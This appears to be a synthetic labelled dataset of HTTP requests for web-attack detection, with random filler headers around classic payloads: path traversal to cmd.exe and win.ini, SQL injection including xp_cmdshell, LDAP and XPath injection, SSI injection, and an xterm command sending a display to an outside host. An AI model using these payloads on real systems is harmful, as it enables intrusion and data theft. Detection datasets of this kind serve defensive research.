Referer: http://www.sodtr7x.ch/s5s7sih.zip
Trailer: Max-Forwards
User-Agent: dvWhXzhN http://www.9sssdj.be
UA-CPU: Sparc
UA-OS: Win9x
Transfer-Encoding: zt7wt; sele=bt15
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

hS=34369961&ie9kpXo5=obodypphpeneltqn otmpe84&Trynortt=if5&ooaoynOeRatOnAz=ilyE.mMGR&l6totemc=q\A(t&DdhNtewrg=08317&5e8je=hSu&itek=928&9utGatatr=2829&oq=eh&tarscej6abnRh=eet71ert&ee=eTtiMeibsi&ncuhTH=98064&iVQiIk=of0x&hBz@Ujlib=sKOgON

End - Id: 39858
Start - Id: 44276
class: OsCommanding
GET ..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.T8nnan.gov
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-roman;q=0.0, koi8-r;q=0.5, iso-8859-15, euc-tw, windows-1252
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: min-fresh=54
Client-ip: 192.246.21.91
Cookie: ecoeHj1meanixs=2sOitahdqnmsSgu;rreeobNf=fabpl;vlaoeasifrNtliY=2386;nye=117064666;efod=nhmE90;i7co=61407809
Cookie2: $Version="915"
Date: Fri, 29 Oct 04 15:03:24 GMT
ETag: "lRY.im-Vf8FuriFi"
Expect: 100-continue
From: iefdsb@2Nyh.org
If-Modified-Since: Wed, 07 Oct 09 09:10:23 GMT
If-Unmodified-Since: Wed, 27 Feb 08 06:28:43 CET
If-Match: "fX3vv9nhjLUGEf3"
If-None-Match: *
If-Range: "QwmlmmG7j.GuYQ4NBEc8"
Max-Forwards: 8560
MIME-Version: 6.9
Pragma: tdrp=f
Proxy-Authorization: vahee otnsenso=4Odndyfc
Authorization: sirh antml6e=VtHst
Range: 1630-9,-816
Referer: /mpmzn5bg.exe
TE: gzip,chunked;q=0.9
Trailer: Via
User-Agent: hIiIzms http://www.emrTaen.cz
UA-CPU: 68000
UA-Disp: 9070,4804,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7064x6561
Via: igk9/5.4 www.6gaSer.htm, 9.8 5.18.32.190, chpde/5.9 134.151.163.153
Transfer-Encoding: identity
Upgrade: coeeIl/9.2, natae/9.1, hi4/9.9, 3tu3nt/4.6, epa5c/2.6
Warning: 674 28.181.161.239 "fsbetechtt6msa4eu" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 87791101469123011682
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44276
Start - Id: 42358
class: SqlInjection
GET /biM@0/PuasodqanbcsR0nZuh5/tAs8bSCzUmg@1Vpunz5/izLZi.C8gqeihN4/passwdwhimgD5Fand/aaZaOx.DPdota/pEgnev9ntau3/o285CM.Lt.p1qchCM8.jsp?entWttPb=%27%3B+++begin+++declare++++%40ret++varchar%288000%29+++++set+%40ret%3D%27%3A%27++select++%40ret%3D%40ret%2B%27+%27%2Bea%2B%27%2F%27%2Bpassword+from++osui+++where+reae4%3E%40ret+++select+%40ret++as++++ret+++++into+foo+++++end--&caSY41j8z@X6=n+i&oEimivpogcver1p=315&Lt0EwNJo1fromJ@=%3Fh&sentjhrsya8dC=silnbeOdeEii4&Z@xw=qu HTTP/1.1
Host: www.3yi3u2i7.st
Connection: erdvooau
Accept: text/*;q=0.6
Accept-Charset: *;q=0.4
Accept-Encoding: compress;q=0.8, deflate, gzip;q=0.4, identity;q=0.3
Accept-Language: sE1-sDS3daue;q=0.7, emc-nonqht, r-dlLe, omEe5r-r;q=0.5
Cache-Control: ibeqe=Leci
Client-ip: 34.178.32.79
Cookie: qxEUTwTO25cs=863;w7c=3oa%liha
Cookie2: $Version="89"
Date: Mon, 10 Dec 07 24:54:45 UTC
ETag: W/"glrcIPm9afn22879"
Expect: 100-continue
From: ttyr@nt7thnt6um.uk
If-Modified-Since: Thu, 19 Apr 07 23:00:35 UTC
If-Unmodified-Since: Tue, 05 May 09 05:10:41 UTC
If-Match: *
If-None-Match: "f-1U4MQ5PQ4AqgK"
If-Range: Wed, 21 Feb 07 16:25:05 CET
Max-Forwards: 2670
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: Basic ZGk5aTpibzA2dG5v
Authorization: NTLM ZWRwZWhhc2Fhbm51aXdxRWVvZWloZXRhZUpxYWVlbnJl
Range: -966,396-333,-3990
Referer: http://www.c3hnoo.com/cEed/sIsn/2ente.swf
TE: gzip,trailers
Trailer: Proxy-Authorization
User-Agent: aauocs (aDRmrFUrH)
UA-CPU: x86
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 999x243
Via: FTP/0.2 60.178.177.40
Transfer-Encoding: identity
Upgrade: ioA/2.2, sl6sg/1.0
Warning: 408 www.eaxt.js "r7iatenLagSol" 
X-Forwarded-For: 171.143.1.2
X-Serial-Number: 71261
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42358
Start - Id: 38115
class: LdapInjection
GET /PX8y1eK0s/Oar/a.XVQSB7jKE2/nciD/copyyv@9.shutdown/prgHowbnrddqhrqe.cgi?bgFTCVidXt=ok2pfoFn3oYN&Een=hIt3%29%28++++%7C++%28crg%3D*%29&.70AEn2QL=Shah+z&cuho2nxdwignAgq=a57etprTet%7Elelemi&l7gIlassySctrfl=E%3Fahinlo&dnwqp=Ln HTTP/1.0
Host: 210.170.180.175
Connection: keep-alive
Accept: */*
Accept-Charset: cp-932, windows-874;q=0.9, x-mac-chinesetrad;q=0.6
Accept-Encoding: 
Accept-Language: t4rls-etiesl;q=0.8, tW3eol-n, junie-onrrRdK;q=0.0
Cache-Control: no-store
Client-ip: 78.109.79.136
Cookie: oeepeTibr=276868673
Cookie2: $Version="4"
Date: Sun, 11 Feb 07 15:42:24 CET
ETag: W/"Irr4LufP3gSyFhulv"
Expect: 100-continue
From: ithsetus@ennnrj.net
If-Modified-Since: Tue, 13 May 08 24:31:28 CET
If-Unmodified-Since: Tue, 12 Sep 06 15:39:28 UTC
If-Match: "Y5KfYhUBUPdlLQ3w"
If-None-Match: *
If-Range: "CXMeTCSkCaS1gdfadX0"
Max-Forwards: 5837
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Digest opaque="r4lciIea"
Authorization: Basic dGVIRWU6ZWFyNGU=
Range: 448259-
Referer: http://www.sfgt.uk/5yie2nb/delola/zreccpn.js
TE: chunked,chunked;q=0.8,trailers
Trailer: Pragma
User-Agent: eioEAm http://www.sone6.net
UA-CPU: 68000
UA-Disp: 072,9161,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 3700x2595
Via: FTP/6.8 153.42.227.91
Transfer-Encoding: gzip
Upgrade: ifowud/4.0, tto/4.9, xoi/9.2, yMow/1.8, ttyat/1.1
Warning: 587 179.247.41.91:5 "gatfalPphg" "Thu, 07 Apr 05 01:06:21 UTC"
X-Forwarded-For: 174.234.21.215
X-Serial-Number: 2885123328233620
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38115
Start - Id: 45131
class: PathTransversal
GET /.nsf/../winnt/win.ini? HTTP/1.0
Host: 120.144.209.47
Connection: keep-alive
Accept: image/gif;q=0.8, audio/*;q=0.5, image/gif;q=0.1
Accept-Charset: us-ascii;q=0.1, euc-kr, utf-8;q=0.0
Accept-Encoding: 
Accept-Language: loxmqtyh-turioeng
Cache-Control: max-stale
Client-ip: 223.196.253.50
Cookie: BUdivcclW=01679;Twindow.openiU=nndumthndsk;odepzsdi=9
Cookie2: $Version="6"
Date: Mon, 08 Mar 04 03:13:19 GMT
ETag: W/"d3mNFnIN_1gDH9-Xe0"
Expect: 100-continue
From: afmCdmi@eoebf6ie.gov
If-Modified-Since: Tue, 07 Jun 05 15:56:38 CET
If-Unmodified-Since: Sun, 06 Mar 05 19:41:35 GMT
If-Match: "wZucsqr@HlFv@TYgFzo"
If-None-Match: "3y0d5VFUVJqetjWtD"
If-Range: Sat, 19 Dec 09 23:16:24 UTC
Max-Forwards: 334
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: NTLM Ym50bGxsNGUxczRoMGhjdXFzeGlsb0xPNHJzaHppVDJmaWVlZW5u
Authorization: Basic dHQwSWFicjo3c2FpYXM=
Range: -3,456-488022
Referer: /e8gz/CreirA/9nltlh.asp
TE: deflate;q=0.4,trailers,gzip;q=0.0
Trailer: Host
User-Agent: olcb/5.8.1
UA-CPU: StrongARM
UA-Disp: 5047,8443,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0464x327
Via: FTP/7.6 www.trsl.jpeg, eia/5.1 248.65.64.243:0, HTTP/0.3 www.scdeq.shtml
Transfer-Encoding: deflate
Upgrade: rnttO/3.2, lWf/3.6
Warning: 694 75.28.35.212 "sieenweirr1p" 
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 3741240593504860
----: ---------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 45131
Start - Id: 48509
class: XPathInjection
POST /doceioor2/ttncr9ade9isO/v0/pZ/kut2m/OL/dEEdminl4eesirN/rB3n4scWJn1CrWV3.htm? HTTP/1.0
Content-Length: 97
Content-Language: tNh,sndudtt
Content-Encoding: identity
Content-Location: http://www.rdbhwyro.uk/Mtp0h5n/atmL/asppgN.asp
Content-MD5: SmVlM29jYW91TjBsZWh0bw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 04 Aug 04 15:04:38 UTC
Last-Modified: Sun, 24 Apr 05 15:58:18 UTC
Host: www.worrmlse5.biz:80
Connection: close
Accept: */*;q=0.2
Accept-Charset: cp-932;q=0.3
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 117.212.24.161
Cookie: 7l=3vE;e1eXvbscriptLEU=104;sht=dhTdter9snlin8hc;paa8qitL8ahuki=39044;rn=of
Cookie2: $Version="5"
Date: Wed, 04 Mar 09 16:41:49 UTC
ETag: W/"Z8k6MID8rdOhM91kgfF"
Expect: medziZgs=din4
From: 3eaqc@eaed.ch
If-Modified-Since: Tue, 21 Oct 08 18:57:20 CET
If-Unmodified-Since: Tue, 22 Feb 05 22:54:44 GMT
If-Match: "sL-.ub@Kc3k8_9X"
If-None-Match: "iULHKT54WCFCYV8FLL"
If-Range: "DQxam.gceadvbjdp"
Max-Forwards: 1
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: NTLM bmNsb2VlWW5oVGl4YWVUZWNQc2dpRGl5YW9lbjRpZXJMdWFkczVl
Authorization: NTLM dE5yYmxvMXJlYW5lYmNuSHNBYXN0ZGF1RGxlcDBJQmMzT0ls
Range: 811682-312,0-
Referer: http://www.Mdarde5.biz/shCi.png
TE: deflate
Trailer: From
User-Agent: s1dfeszj (hMS5S0e; etqPxF2; nSapsNOs; teTZ5VqWTg; tl0hxXE.0)
UA-CPU: 68000
Via: 7.4 www.mmaEas.shtml, 6than5/3.6 www.hbahnoe.gif
Transfer-Encoding: compress
X-Forwarded-For: 104.189.251.216
X-Serial-Number: 01871
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

tp=4ctyrz']     |   P  |   //user[   name/text()   ='hr&fsjsteoRo6iw5k=65

End - Id: 48509
Start - Id: 35594
class: XPathInjection
GET /egfXRqIkgMr2R_P.h.php4?sfFaMoEn7teyieo=%28r&s2=he6ee7enoeg&pa=ramWeor%24execwo&rblmaibeqjg=7511&sieOsenrctral=nph-oe+5&4doPsedjoblie=sa+%28h+r&nd8tu=560365186&arrylolues1=0tai2si7&cealo=5183555&seddUercb=24890&bUVagi=46+or+++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or++9756%3D HTTP/1.0
Host: 244.63.81.207
Connection: Euulelo
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.5
Accept-Language: 3fhn5-aAa;q=0.1, xideh-dosyonon
Cache-Control: oo=oty6
Client-ip: 180.187.68.18
Cookie: oreeinzeto4r8e=eoytn;gthmeep=ptdsId;triSOciurzkett=o-OJqtDGNqA;nhuqx=0;9rteazee=tf-J.i5fA;uvVqmc=Ose
Cookie2: $Version="931"
Date: Mon, 11 Jul 05 17:43:39 UTC
ETag: W/"7umuTM27UJFVw2-bKB"
Expect: hqEihs
From: tASlr@5tO79me.st
If-Modified-Since: Sat, 24 Jun 06 20:37:15 UTC
If-Unmodified-Since: Thu, 07 Sep 06 09:30:37 CET
If-Match: "ShnD2NkYPCwI-Pnxb"
If-None-Match: "rwOo.Tuonx4ayEEa"
If-Range: "yVtkiY1Seq-Clxsib"
Max-Forwards: 9
MIME-Version: 4.7
Pragma: o='aeU'
Proxy-Authorization: NTLM b2RXcmx2M25sdGE2b3dvcmVIaGxuZWh5b2lzdGlXWGRvdnlvUm0xZXQxbU8zYm0=
Authorization: Digest algorithm=MD5-sess
Range: 1278-6
Referer: http://atQodcn.net/d6thicoo.css
TE: trailers,trailers,chunked
Trailer: Warning
User-Agent: Mozilla/5.2 (compatible; bityto; Linux i386; iApca; cn1dst1; mrJap0ncie)
UA-CPU: 68000
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 138x439
Via: 6.9 www.pa3eVo.css, nrop4/9.3 www.aeas.gif:883, 1.7 www.yfewB.jpeg
Transfer-Encoding: compress
Upgrade: anfbe/0.9, m2ntt/2.0
Warning: 204 197.17.40.24 "eS4aShneveaeoeqAni" "Sun, 06 Nov 05 19:18:19 CET"
X-Forwarded-For: 245.111.237.199
X-Serial-Number: 65275952070459353
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35594
Start - Id: 48630
class: XPathInjection
POST /dYMPMN9Veb5fRI/neliififyaM2/m0tperrvhNeen0acsbt/iq_EjGy-TK8LAC/Enol9aeasi/rupcevtemet/t2jdiyveyGe8/isnjxnlo.html? HTTP/1.1
Content-Length: 294
Content-Language: jhc9lano,gvhh,elSttsi8
Content-Encoding: compress
Content-Location: http://www.anbtk.be/tnhltt/eIsda/xEh1e.asp
Content-MD5: dmVhb3dpb20xY2NKcnNhYw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 07 Feb 05 16:20:24 GMT
Last-Modified: Mon, 20 Oct 08 06:30:32 UTC
Host: 235.184.37.212
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: uiaeeh8y-netEo, cccwi109-i, qo9-ynsh, ik-eVtsi;q=0.8, i-tghcoss;q=0.8
Cache-Control: only-if-cached
Client-ip: 212.18.180.154
Cookie: W0Hh=/C>
Cookie2: $Version="46"
Date: Mon, 18 Oct 04 05:41:27 GMT
ETag: W/"nUus8CIhQ-6I@fzm7nrc"
Expect: 100-continue
From: wsnewerh@atausf.it
If-Modified-Since: Fri, 07 Jul 06 19:07:03 UTC
If-Unmodified-Since: Fri, 19 Dec 08 23:01:02 CET
If-Match: "5afK2CFx_t3mYcC_K"
If-None-Match: "ETknoUyrhJSSRp0c"
If-Range: Thu, 08 Dec 05 02:29:33 CET
Max-Forwards: 6801
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: NTLM eW5FcXBhcmVnbWJ1cjJhdWFlRTBsbjg1b25ld2N0bmxPVWg=
Authorization: Basic bHQwU3JTTzpSaXhpZWVw
Range: -046912,8351-4,007308-22
Referer: /vEnnurm/yosgrl9m/Nfaht/ONsb.swf
TE: deflate;q=0.2
Trailer: Referer
User-Agent: esgiahaatncm
UA-CPU: Sparc
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 090x151
Via: fsllte/9.8 www.Tctow8.jpg, HTTP/4.6 www.otld.css
Transfer-Encoding: compress
Upgrade: eode/7.7
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 98968
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ieeEc9la=anBit&Rmrda=uottCO'     or count(path/child::node()[position()=(( i +  j   +k   + l    + 1)] |   path/child::*()[position()=(k+1)])=1    or     'dqovep' =' hIll8aa'   or&ewhen9uhrh=;t&iaMueeot1nE=lmimoN5

End - Id: 48630
Start - Id: 45235
class: PathTransversal
GET ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////? HTTP/1.0
Host: www.nbovqaD.st
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: cp-932;q=0.5, big5, iso-8859-8;q=0.3, euc-cn
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 83.132.12.183
Cookie: 79Tinputboot.ini2P=pNX0Fwh2Dsw;s1mrpxihnzeejos=6;hdnToohs=mu7ZE;AhsEa=e
Cookie2: $Version="8"
Date: Sat, 30 Sep 06 14:40:09 CET
ETag: W/"t2Ytcd_RbO7gw0dHf"
Expect: eterw=afhcvs7t
From: nr1cs36r@ar1hsxlt.org
If-Modified-Since: Tue, 01 May 07 03:59:47 UTC
If-Unmodified-Since: Sun, 29 Apr 07 07:15:34 GMT
If-Match: *
If-None-Match: "C.H7XAnMwTF16WeK"
If-Range: *
Max-Forwards: 17
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest qop=evai40
Authorization: NTLM c2N0cDN5bHRtcWlydG9hbW43M2RidHU3dHh3bmFlbzZ0RVJscjhrbjVsZG5jYmM=
Range: 220-5761,42620-
Referer: /rvwshull.fgf
TE: chunked;q=0.3,trailers
Trailer: Expect
User-Agent: v6K16LJ http://www.9inta5ie.it
UA-CPU: x86
UA-Disp: 675,5988,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2272x045
Via: HTTP/3.9 www.ee60tcs.shtml
Transfer-Encoding: identity
Upgrade: ttt5/9.0, laolhr/8.9, geei2/4.3
Warning: 831 www.rueghla.htm "ecA7eejeodtti" 
X-Forwarded-For: 42.110.150.96
X-Serial-Number: 706890452941318
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45235
Start - Id: 37445
class: LdapInjection
GET /mnYCFrZIk/67betweenA3L0GQUall./bT0LO_Zgp/cE83u0.0HaD-/qbhahfiiL2nw/el5o.php?IFr-OLc=57&easndrr3femiuf6=rdJEYMsL&DStaeaao=esCzep&oejIso0hanye=inshutdownI&W8xTJW=ewtn4&atOofnf=i0select7 HTTP/1.1
Host: 136.187.251.11:884
Connection: keep-alive
Accept: audio/basic
Accept-Charset: x-mac-greek, ks_c_5601-1987, iso-2022-jp;q=0.5, windows-1251, iso-8859-8-i
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 58.223.122.227
Cookie: eh=)   (|(   cn=*o   'brien* )(mail  =*o    'brien*  ) ;Fhednrddl=86823;SLtk=6TlUVmaKKJ;e7cfm=ri6eune;fN6B.DShARR9=18
Cookie2: $Version="01"
Date: Wed, 24 Mar 10 10:36:45 GMT
ETag: W/"d270caUDksMd6oQ"
Expect: sswgnH=iil8irEs;afd4Eamu=h4mnha
From: k7ssi@mAb8.it
If-Modified-Since: Tue, 16 Jan 07 17:56:06 UTC
If-Unmodified-Since: Sat, 27 May 06 08:18:20 CET
If-Match: "85zxJMQzn5D8uh@K"
If-None-Match: *
If-Range: Sun, 18 Jul 04 14:44:10 CET
Max-Forwards: 4128
MIME-Version: 6.4
Pragma: e7picp=e29t3ao
Proxy-Authorization: Basic eTdvYXVQdDo2eTNpbw==
Authorization: Digest uri=http://dd2dWqf.biz/R5h5n/8te3tal/Giecas.htm
Range: 19440-3591
Referer: /yttAhoaP.wmn
TE: chunked;q=0.9,deflate;q=0.4,chunked;q=0.2
Trailer: If-Range
User-Agent: bnfdo6EYic5Dinearsa
UA-Disp: 3647,135,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3721x5671
Via: 8.4 219.111.164.199:027
Transfer-Encoding: gzip
Upgrade: o1te/3.9, e0te/6.5, 0estiY/4.9
Warning: 644 239.84.186.117 "oiassskshmhetstl" "Tue, 01 Aug 06 15:26:49 GMT"
X-Forwarded-For: 188.52.154.151
X-Serial-Number: 9320114880
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 37445
Start - Id: 37927
class: LdapInjection
GET /FHE/i.siA2FQgwM/d8k5/noldeoAmdueeaiau/aad1/pu/edYAQH/derc7orss0assmg/euptlisfitun4cA7ncso.shtml?qtoWIraJnan=ahzoihNyeio&nnD8aRer=e&_jallTFcFf6I=%2Brf&cfh5=trf&drs4osNau9ufh=4183133523&ee=5&t4=9&13echon06fwTfromLG=65&tdor6efehhrnce=okomuvn&eesEnJcllbone=232%29%28%26%28objectClass%3Dgis%29%28%7C%28sn++++%3D++++Sdu%29%28cn%3Dnh+++J*%29%29 HTTP/1.1
Host: 120.165.103.26
Connection: qtgnci
Accept: audio/*;q=0.1
Accept-Charset: isiri-3342, iso-8859-7
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 68.144.9.61
Cookie: iueiEMyreig6ly=a1>tvarcibd<lhN<n;2wnliia7=4315742450;mtiweqmewt=85 ;il64yom=77;k8tfeaboMhLxa=06
Cookie2: $Version="988"
Date: Wed, 29 Apr 09 20:27:38 CET
ETag: "yzFFwi2xkZtkbQro8al"
Expect: dtawu=4tsB
From: zoeyt@dfSho.com
If-Modified-Since: Wed, 11 Aug 04 10:11:15 CET
If-Unmodified-Since: Wed, 21 Feb 07 16:17:12 UTC
If-Match: *
If-None-Match: "GbVs1amUiJ9h-9Hn0"
If-Range: Tue, 01 Apr 08 03:09:34 GMT
Max-Forwards: 97
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Basic VWFjaDp3YXls
Authorization: ffwo gostPoe8=llnctoy
Range: 478-6,9746-59,-9293
Referer: http://udsa.com/husaodat/rttxe/Td6xto/ci0iex5e.png
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/1.1 (Windows; U; Win 9x 9.7; rD-b5; rv:7.2.4) Gecko/70345880
UA-CPU: MIPS
UA-Disp: 472,2226,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 649x451
Via: 0.6 www.vhpCtwa.html, FTP/3.4 164.7.65.205:787, FTP/7.7 198.28.250.219
Transfer-Encoding: PChnah; hsgbn=0e6cb
Upgrade: udtE/5.5, hiteNc/1.2, tffIc/7.5, nhr/8.0, ptIvu/0.9
Warning: 778 www.sriAh.html "u4ef" 
X-Forwarded-For: 143.12.94.194
X-Serial-Number: 03021
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37927
Start - Id: 41174
class: SqlInjection
POST /aa/pxb95RnnUuiaLTZ.D/eFk/ae7mxbRrf0jnOrwsU/a4W3L45mwA/enjpA@war.n3oAW/vbk.bBnECB.BFvV5Fl/rV5h/oQgAHaH_/mbtnltiocrtd/xrVc1rCBjI1xFservicesz.css? HTTP/1.1
Content-Length: 172
Content-Language: geIa1
Content-Encoding: deflate
Content-Location: /reni5/onynO/ruIe7l/sjmotwg.jsp
Content-MD5: ZHdpM250YXdBbnRlMmlvaA==
Content-Type: application/x-www-form-urlencoded
Host: www.rqthd.org
Connection: 8aoois
Accept: image/gif;q=0.8, application/postscript;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: haEae-ln;q=0.9, ucDa9rf-e, okuso-jt8oo
Cache-Control: no-cache
Client-ip: 51.68.183.210
Cookie: t_nVb=';EXEC    master.dbo.xp_cmdshell   'cmd.exe
Date: Sun, 06 May 07 06:25:05 UTC
If-Unmodified-Since: Mon, 28 Apr 08 19:26:36 GMT
If-None-Match: *
Max-Forwards: 3
Authorization: NTLM bHloemZyaGhwdG9paGFyZW13eGNhb2hucnJuc3NuaHhmaFlzQWgyWQ==
Referer: /obepb9.mdb
User-Agent: Mozilla/9.8 (Machintosh; U; PPC 4.9; ct-3f; rv:6.6.5) Gecko/69846304

8ntnz2talnyret=gnqLe2u2hw&ri8tgn7iwabst=rhkunxehSceO\&edtcanyaDabeo= qn8mia9tnh-0object&RDYNs6vyBn=3778&eegte=maaydsfuduNden&elaqdPu1srylc=00350&@evaldg-CnFx14=2114104649

End - Id: 41174
Start - Id: 40890
class: SSI
GET /emTT_j@QpUa2w5J/epGdo5TJQM1N-jXmmOi.msf?ss=98651&K@MSwsamB6V=%3C%21--+++%23odbc++++statement++++%3D++++%22select+++l5ynneS5%2C++tNdme%2C++++nTtc+from++++7szesat+++++order++++by+++++3%2C++++21%2C+++3%22+--%3E HTTP/1.1
Host: www.e4e72e.cz
Connection: keep-alive
Accept: */*
Accept-Charset: iso-10646-ucs-2, iso-8859-6;q=0.1, windows-1257
Accept-Encoding: identity;q=0.4, compress, gzip, compress, compress
Accept-Language: Rm-uncetitn, ey2-l28do;q=0.7, 1gm-9aibeA;q=0.2
Cache-Control: no-store
Client-ip: 74.22.128.43
Cookie: D4hhnna6tgx=4076658244;xclohtoaafs=passwd ;1snnTien3rcH0=f0lK3Y;ctanrste6box=84989;z3tCnwise=emafauu;eireOUsO4ed=sock_streamroe
Cookie2: $Version="39"
Date: Tue, 01 Nov 05 02:32:39 UTC
ETag: W/"cdUEMz1rdtb6L7v"
Expect: 100-continue
From: iead0@nuqh1.org
If-Modified-Since: Fri, 07 Aug 09 04:00:05 GMT
If-Unmodified-Since: Fri, 04 Jan 08 01:00:01 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 15 Jan 05 02:24:26 CET
Max-Forwards: 1
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic dHQybmlKOmVtc3dzckFy
Authorization: NTLM dGRqYUlJdG5vODJuZW5kN25yaXR0c2FjQXJwaW90aWlyeHlyYXNpZXNza2lvSXNy
Range: 453-748
Referer: http://www.tt5f9o.net/yis9ooh/jzesaa/trmss4En/jt4pmahe.jpg
TE: deflate
Trailer: Accept-Charset
User-Agent: itSeitZtray4
UA-CPU: x86
UA-Disp: 8926,1457,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5993x410
Via: 5.3 www.savk.jpeg
Transfer-Encoding: gzip
Upgrade: i72f/4.9, Zi2a/5.6, sifx9/9.1
Warning: 063 170.129.30.215:3080 "tttenlbdte1UerRsne1h" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 1967556980
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40890
Start - Id: 43507
class: OsCommanding
GET /FEjJ1EdV.pl?fromxMjsHT=%250A++xterm+++++-display+++++www.ntri.com%3A0.0++&5hmc2Bps=pmk.z5P&rCtkrna1eene=0105416&Xk6S4JwWa=c%3Eisfdrs7a%24reieg+%29a HTTP/1.1
Host: www.sAytx6.net
Connection: uqnamE
Accept: video/quicktime;q=0.1, video/mpeg;q=0.3
Accept-Charset: *;q=0.8
Accept-Encoding: gzip;q=0.9
Accept-Language: Yar-o, me-nal02
Cache-Control: max-age=55
Client-ip: 108.184.195.217
Cookie: xtermahttpBT=ndh@h8;etgeZ=hhzrl)miframennprr;mzihdeb=i0l3imfw;efaobanst=e;NThdemsEneoBtf8=pswa7aSiiss
Cookie2: $Version="916"
Date: Tue, 22 Apr 08 16:06:44 UTC
ETag: "fjlXexFkQrSUUa5G"
Expect: qEtoe
From: entRerd@7ndhcnQeej.be
If-Modified-Since: Sat, 30 Jan 10 12:13:26 CET
If-Unmodified-Since: Fri, 02 Dec 05 13:56:19 GMT
If-Match: *
If-None-Match: "aCy_OQPNF8DHBN7YBx"
If-Range: Mon, 03 Jul 06 13:27:32 CET
Max-Forwards: 906
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic bFJvZ25nOmVmVGNx
Authorization: Basic d2lzZnR2OnBGcXR0ZGhp
Range: 32-61,4386-85
Referer: /Dperncms.mdb
TE: deflate,trailers
Trailer: If-Range
User-Agent: iniionou (tF0xC6me)
UA-CPU: MIPS
UA-Disp: 8368,7946,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5281x2497
Via: HTTP/3.4 www.6aaaOs.js
Transfer-Encoding: compress
Upgrade: ote/6.5, duri/2.2, tc0/0.3, IHe7/3.9
Warning: 900 www.eenCnh.jpeg "aDmktlcy9embade" 
X-Forwarded-For: 134.201.54.76
X-Serial-Number: 521013041943
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43507
Start - Id: 45626
class: PathTransversal
GET /tepeckzeiuhodGbtaHhn/Gy.updatetmpKnetcatLdzf/xmlWbLA_YL/mwlV@fGQ1BqfY.dMor0/e4WbjVDO/awecnednEi/fy8V9FGnhT%uxQPeval/TJocAalImatsihszfq0/E2mT3r-WG_B8Wf.htm?ee=2&xdVarsystemyphp_L=e&U1retah5neyaa=osn+whereAmteSdivip7M&Hurheo=oJqU&ieoIr=o%3A%5C%5CWINNT%5C%5Cwin.ini HTTP/1.1
Host: www.ialzg8a.cz:80
Connection: keep-alive
Accept: image/*;q=0.6, audio/*, video/quicktime
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=4
Client-ip: 95.84.73.85
Cookie: ooheshdgie8lmin=gevb shtpassu1ur;9eureudsnpd=i9qf0R2Fd7Vd;Tetejupeift=hTMulFM;dqoxktHd=8636190;afdrsrep2=oenth;ndilnH=hHlb2a
Cookie2: $Version="56"
